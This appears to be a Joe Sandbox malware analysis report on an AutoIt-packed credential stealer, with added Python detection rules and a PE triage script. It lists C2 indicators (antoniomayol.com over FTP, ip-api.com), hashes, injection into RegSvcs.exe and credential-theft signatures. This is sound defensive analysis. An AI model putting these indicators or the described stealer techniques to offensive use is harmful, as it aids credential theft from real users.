Source: Yara match | File source: 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1712, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6796, type: MEMORYSTR
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_00188C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\XoRPyi5s1i.exe | Code function: 1_2_0018923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_01028C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0102923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix: techniques flagged by the report, grouped by tactic. The bracketed digits are the report's signature-count badges, reproduced as extracted. Unflagged matrix cells are omitted; Reconnaissance and Lateral Movement have no flagged technique.

Resource Development: Scripting [111]
Initial Access: Valid Accounts [2]
Execution: Windows Management Instrumentation [221]; Native API [3]
Persistence: Scripting [111]; DLL Side-Loading [1]; Valid Accounts [2]; Registry Run Keys / Startup Folder [2]
Privilege Escalation: Exploitation for Privilege Escalation [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [212]; Registry Run Keys / Startup Folder [2]
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [21]; Software Packing [11]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [231]; Access Token Manipulation [21]; Process Injection [212]
Credential Access: OS Credential Dumping [2]; Input Capture [21]; Credentials in Registry [1]
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [138]; Security Software Discovery [751]; Virtualization/Sandbox Evasion [231]; Process Discovery [2]; Application Window Discovery [11]; System Owner/User Discovery [1]; System Network Configuration Discovery [1]
Collection: Archive Collected Data [1]; Data from Local System [2]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]
Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]
Exfiltration: Exfiltration Over Alternative Protocol [1]
Impact: System Shutdown/Reboot [1]
Behavior Graph (ID 1587765; sample XoRPyi5s1i.exe; start date 10/01/2025; architecture WINDOWS; score 100)

Top-level network contacts: ftp.antoniomayol.com, antoniomayol.com, ip-api.com
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

XoRPyi5s1i.exe (started)
    dropped: C:\Users\user\AppData\...\unjuridically.exe, PE32
    signatures: Binary is likely a compiled AutoIt script file
    started: unjuridically.exe
        dropped: C:\Users\user\AppData\...\unjuridically.vbs, data
        signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 3 other signatures
        started: RegSvcs.exe
            network: antoniomayol.com, 162.241.62.63, ports 21, 43704, 49706, UNIFIEDLAYER-AS-1US, United States; ip-api.com, 208.95.112.1, ports 49704, 49710, 80, TUT-ASUS, United States
            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

wscript.exe (started)
    signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    started: unjuridically.exe
        signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        started: RegSvcs.exe
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
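The graph above gives a detection engineer four cheap, high-signal hooks: a script host (wscript.exe) launching an executable out of %LOCALAPPDATA%, a .vbs landing in the Startup folder, RegSvcs.exe (a .NET Framework utility with no business on the network) opening sockets, including FTP on port 21, and a DNS lookup of ip-api.com for the hosting check. The Python below is an added example, not Joe Sandbox output: it encodes those four rules and runs them over constructed Sysmon-style events that replay the wscript.exe branch of the graph (only the paths, hosts and ports are taken from the report; the event layout, rule names and the benign Chrome events are this example's own).

```python
"""Detection rules derived from the behaviour graph above.

Added example, not part of the Joe Sandbox report. The event dicts are
constructed Sysmon-style records (EventID 1 = process create, 3 = network
connection, 11 = file create, 22 = DNS query) that mirror the graph.
"""
import re
from dataclasses import dataclass

LOCALAPPDATA_EXE_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\.+\.exe$", re.I)
STARTUP_SCRIPT_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:vbs|vbe|js|jse|wsf|bat|cmd)$",
    re.I,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# .NET Framework utilities that are popular hollowing targets; none of them has a
# reason to open sockets on a workstation, so any connection is worth an alert.
DOTNET_INJECT_TARGETS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# The report shows ip-api.com/line/?fields=hosting used to detect data-centre hosts.
GEO_CHECK_DOMAINS = {"ip-api.com"}


@dataclass(frozen=True)
class Alert:
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def scan(events):
    """Apply the four rules to a sequence of event dicts and return the alerts raised."""
    alerts = []
    for e in events:
        eid = e["EventID"]
        if eid == 1 and _basename(e["ParentImage"]) in SCRIPT_HOSTS \
                and LOCALAPPDATA_EXE_RE.match(e["Image"]):
            alerts.append(Alert("script_host_spawns_localappdata_exe",
                                f"{e['ParentImage']} -> {e['Image']}"))
        elif eid == 3 and _basename(e["Image"]) in DOTNET_INJECT_TARGETS:
            alerts.append(Alert("dotnet_utility_network_connection",
                                f"{_basename(e['Image'])} -> {e['DestinationIp']}:{e['DestinationPort']}"))
        elif eid == 11 and STARTUP_SCRIPT_RE.search(e["TargetFilename"]):
            alerts.append(Alert("script_dropped_in_startup_folder", e["TargetFilename"]))
        elif eid == 22 and e["QueryName"].lower() in GEO_CHECK_DOMAINS:
            alerts.append(Alert("hosting_provider_check",
                                f"{_basename(e['Image'])} queried {e['QueryName']}"))
    return alerts


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
DROPPER = r"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"

# Constructed events replaying the wscript.exe branch of the graph, plus two benign
# Chrome events (the Chrome path and IP are made up for the example).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": DROPPER},
    {"EventID": 1, "ParentImage": DROPPER, "Image": REGSVCS},
    {"EventID": 11, "Image": DROPPER,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"},
    {"EventID": 22, "Image": REGSVCS, "QueryName": "ip-api.com"},
    {"EventID": 3, "Image": REGSVCS, "DestinationIp": "208.95.112.1", "DestinationPort": 80},
    {"EventID": 3, "Image": REGSVCS, "DestinationIp": "162.241.62.63", "DestinationPort": 21},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "142.250.74.78", "DestinationPort": 443},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.rule}: {a.detail}")
```

On the constructed events the script raises five alerts: the wscript.exe spawn, the Startup-folder drop, the ip-api.com lookup and both RegSvcs.exe connections (the port 21 one is the credential-exfiltration channel the report's FTP signatures describe). The two Chrome events produce nothing. The RegSvcs.exe rule deliberately has no allow-list: on a workstation fleet a hit is rare enough that triaging every one is cheaper than tuning.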

Antivirus detection, submitted file (Source | Detection | Scanner | Label):
  XoRPyi5s1i.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject
  XoRPyi5s1i.exe | 75% | Virustotal
  XoRPyi5s1i.exe | 100% | Joe Sandbox ML
Antivirus detection, dropped files (Source | Detection | Scanner | Label):
  C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | 100% | Joe Sandbox ML
  C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject
No Antivirus matches
No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label):
  http://antoniomayol.com | 0% | Avira URL Cloud | safe
  http://ftp.antoniomayol.com | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
  antoniomayol.com | 162.241.62.63 | true | true | (none) | unknown
  ip-api.com | 208.95.112.1 | true | false | (none) | high
  ftp.antoniomayol.com | unknown | unknown | true | (none) | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
  http://ip-api.com/line/?fields=hosting | false | (none) | high
URLs from memory and binary data (Name | Source | Malicious | Antivirus Detection | Reputation):
  http://antoniomayol.com | RegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://ftp.antoniomayol.com | RegSvcs.exe, 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://account.dyn.com/ | unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp; RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp; unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp | false | (none) | high
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
  http://ip-api.com | RegSvcs.exe, 00000003.00000002.1759111778.00000000025F1000.00000004.00000800.00020000.00000000.sdmp; RegSvcs.exe, 00000007.00000002.2847350109.000000000315C000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
  208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
  162.241.62.63 | antoniomayol.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1587765
                                  Start date and time:2025-01-10 17:50:03 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 10s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:XoRPyi5s1i.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 65
                                  • Number of non-executed functions: 294
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:51:27 | API Interceptor | 1999943x Sleep call for process: RegSvcs.exe modified
17:51:24 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs
Joe Sandbox View / Context. Original columns: Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context. The SHA 256 and Link columns were links ("Get hash", "Browse") and are omitted below.

Context for IPs:
  208.95.112.1
    NX8j2O83Wu.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    7569qiv4L2.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    hCkkM0lH0P.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    sDflTDPSLw.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    2HCwqwLg1G.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    CdbVaYf8jC.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    H9YFiQB7o3.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    lFlw40OH6u.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    Pago devuelto #.Documentos#9787565789678675645767856843.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
    driver.exe: malicious, Blank Grabber; context: ip-api.com/json/?fields=225545
  162.241.62.63
    Order 122001-220 guanzo.exe: malicious, FormBook; context: www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

Context for domains:
  ip-api.com
    NX8j2O83Wu.exe, 7569qiv4L2.exe, hCkkM0lH0P.exe, sDflTDPSLw.exe, 2HCwqwLg1G.exe, CdbVaYf8jC.exe, H9YFiQB7o3.exe, lFlw40OH6u.exe, Pago devuelto #.Documentos#9787565789678675645767856843.exe: malicious, AgentTesla; context: 208.95.112.1
    driver.exe: malicious, Blank Grabber; context: 208.95.112.1

Context for ASNs:
  UNIFIEDLAYER-AS-1US
    NX8j2O83Wu.exe: malicious, AgentTesla; context: 162.241.62.63
    B8FnDUj8hy.exe: malicious, AgentTesla; context: 192.254.225.136
    FSRHC6mB16.exe: malicious, AgentTesla, PureLog Stealer; context: 50.87.144.157
    9pIm5d0rsW.exe: malicious, AgentTesla, PureLog Stealer, zgRAT; context: 50.87.144.157
    armv6l.elf: malicious, Unknown; context: 76.162.166.146
    https://sacredartscommunications.com/: malicious, HTMLPhisher; context: 192.185.25.242
    http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t: malicious, EvilProxy, HTMLPhisher; context: 192.185.118.129
    5.elf: malicious, Unknown; context: 162.144.117.236
    https://p3rsa.appdocumentcenter.com/BpdLO: malicious, HTMLPhisher; context: 162.241.149.91
    https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu: malicious, Unknown; context: 162.241.149.91
  TUT-ASUS
    NX8j2O83Wu.exe, 7569qiv4L2.exe, hCkkM0lH0P.exe, sDflTDPSLw.exe, 2HCwqwLg1G.exe, CdbVaYf8jC.exe, H9YFiQB7o3.exe, lFlw40OH6u.exe, Pago devuelto #.Documentos#9787565789678675645767856843.exe: malicious, AgentTesla; context: 208.95.112.1
    driver.exe: malicious, Blank Grabber; context: 208.95.112.1
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Category:dropped
                                  Size (bytes):550912
                                  Entropy (8bit):7.9240582473113905
                                  Encrypted:false
                                  SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiGDtC2ajbP50s3o32+:Zq5TfcdHj4fmbcv13GV
                                  MD5:FC76D8B178C0AA094EBA5FEA74E82614
                                  SHA1:F2F88413E1E3AED4FD731769037C3D2391D29C94
                                  SHA-256:811C8854EA3ADCD1259C28CF1DC60E0A0A2F7A44F463E98F77C277A2A2F6394B
                                  SHA-512:72F5CA123610CBC3CCEE6630148C61E99F8DDBFFBBE835EB2BF323A0A6D5F2FDD57BAFA139595E62EA485F2086B1DD46F994281070639CD5E7FF89EB3422FD2B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 63%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....hg.........."......P...0...`..`....p........@.......................................@...@.......@.........................$...................................................................D...H...........................................UPX0.....`..............................UPX1.....P...p...B..................@....rsrc....0......."...F..............@......................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
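The dropped unjuridically.exe above has exactly the MD5, SHA1 and SHA-256 of the submitted sample, so the "dropped" file is a byte-identical self-copy placed under %LOCALAPPDATA%\Lityerses, and its UPX0/UPX1 section names together with an entropy of 7.92 bits per byte mark it as UPX-packed. The Python below is an added example, not part of the Joe Sandbox report: it recomputes those three indicators offline (SHA-256 match against the report's hash, 8-bit Shannon entropy, section names read from the COFF section table without a third-party PE library). build_fake_pe() constructs a header-plus-section-table buffer purely so the script has test input; it is not the malware and not a runnable executable.

```python
"""Static triage of a dropped PE against the report's indicators.

Added example, not part of the Joe Sandbox report. The only value taken from
the report is REPORT_SAMPLE_SHA256; the fake PE builder is constructed test data.
"""
import hashlib
import math
import struct

# Copied from the report's file table (submitted sample == dropped unjuridically.exe).
REPORT_SAMPLE_SHA256 = "811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b"
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 to 8.0; the same measure as the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list:
    """Section names from the COFF section table, or [] if the buffer is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # first IMAGE_SECTION_HEADER (40 bytes each)
    names = []
    for i in range(num_sections):
        off = table + i * 40
        if off + 40 > len(data):
            break                             # truncated table: stop rather than read garbage
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes, known_sha256: str = REPORT_SAMPLE_SHA256) -> dict:
    """Hash, entropy, section list, packer verdict and whether the file equals known_sha256."""
    sha = hashlib.sha256(data).hexdigest()
    sections = pe_section_names(data)
    return {
        "sha256": sha,
        "entropy": round(shannon_entropy(data), 3),
        "sections": sections,
        "upx_packed": any(s in UPX_SECTION_NAMES for s in sections),
        "self_copy_of_sample": sha == known_sha256.lower(),
    }


def build_fake_pe(section_names, payload: bytes = b"") -> bytes:
    """Constructed test input: DOS stub, PE signature, COFF header, blank PE32 optional
    header and a section table with the given names. Nothing in it is executable."""
    e_lfanew = 0x80
    opt_size = 0xE0                            # sizeof(IMAGE_OPTIONAL_HEADER32)
    buf = bytearray(b"MZ").ljust(0x3C, b"\0")
    buf += struct.pack("<I", e_lfanew)
    buf = buf.ljust(e_lfanew, b"\0")
    buf += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    buf += b"\0" * opt_size
    for name in section_names:
        buf += name.encode("ascii").ljust(8, b"\0") + b"\0" * 32
    return bytes(buf) + payload


if __name__ == "__main__":
    sample = build_fake_pe(["UPX0", "UPX1", ".rsrc"], payload=bytes(range(256)) * 4)
    print(triage(sample))
```

Run triage() over the contents of %LOCALAPPDATA% on a suspect host with the report's hash as known_sha256 and a hit on self_copy_of_sample is conclusive; upx_packed plus an entropy near 8 is only a hint, since UPX is also used by legitimate software, so treat those two fields as a prioritisation signal rather than a verdict.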
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):245248
                                  Entropy (8bit):6.5490173775607365
                                  Encrypted:false
                                  SSDEEP:6144:PceANBRND9iy7zfovLfMJny1bZZYUlqzEO3IL0u9SYXAgrLjc98:ZANv3fY5TAe4u9SYXAejm8
                                  MD5:FD16AC67E115A223CC50F5019A3F052B
                                  SHA1:1D703AC8FF6EB9450697CD1876405AE608E9CF37
                                  SHA-256:11374F7B169A7DD18927070D7961F1050FC8B6A98B9803EB15A2687F4A62D89D
                                  SHA-512:593582A3D9EB4D2A9E0A35099819A14FD3B6633456A2F33C48652BF97F615E34ABC435BDF7C9144E54F9E7D6B88480110892B51E9D5D29E73698B80D493EF2FD
                                  Malicious:false
                                  Reputation:low
                                  Preview:z..W6AB1V9N9..RX.5AB1R9NyM7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1.9N9C(.VW.H...8..lc:1$.10^5K/TmT369Z5bS7.<L#.;6wq...?V*\c:_Rs5AB1R9Ni.7R.V6A1.._N9M7RXW5.B3S2O2M7.[W5IB1R9N9..QXW.AB1.:N9MwRXw5AB3R9J9M7RXW5EB1R9N9M7r\W5CB1R9N9O7..W5QB1B9N9M'RXG5AB1R9^9M7RXW5AB1R5.:MxRXW5.A1.<N9M7RXW5AB1R9N9M7RXW1AN1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB.R9F9M7RXW5AB1R1n9M.RXW5AB1R9N9cC7 #5ABU.:N9m7RX.6AB3R9N9M7RXW5AB1R.N9-. +%VAB1.<N9M.QXW3AB1.:N9M7RXW5AB1R9.9Mw|*2Y.!1R5N9M7R\W5CB1R.M9M7RXW5AB1R9NyM7.XW5AB1R9N9M7RXW5..2R9N9M.RXW7AG1..L9%.SXT5AB0R9H9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB,......l.*.K 6...^.4..D..;..6.,.LF.~.O....jBT..5.M..0...".IGHS....j8\DO*b%.AX.*....|cE.r.?#.(..?p.<?j.d...q.....6:g...,.."-\|X>I!R|.6S 0X.;.8M7RX......P5|.uT:_v#*o..fJ/c...GN9MSRXWGAB139N9.7RX85AB_R9NGM7R&W5A.1R9.9M7eXW5dB1RTN9M.RXWKAB1.DA6..1$..B1R9N...b.:...n.....#.)n#z..*....]..N*.%z.~..\.^..&.RH..oUYQ1D@6V:B.C|....CF5W;I=N;oV........t...&...b(.29M7RXW.AB.R9N..7.XW5.B.R..9M7.W.A.1..9
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Reputation:low
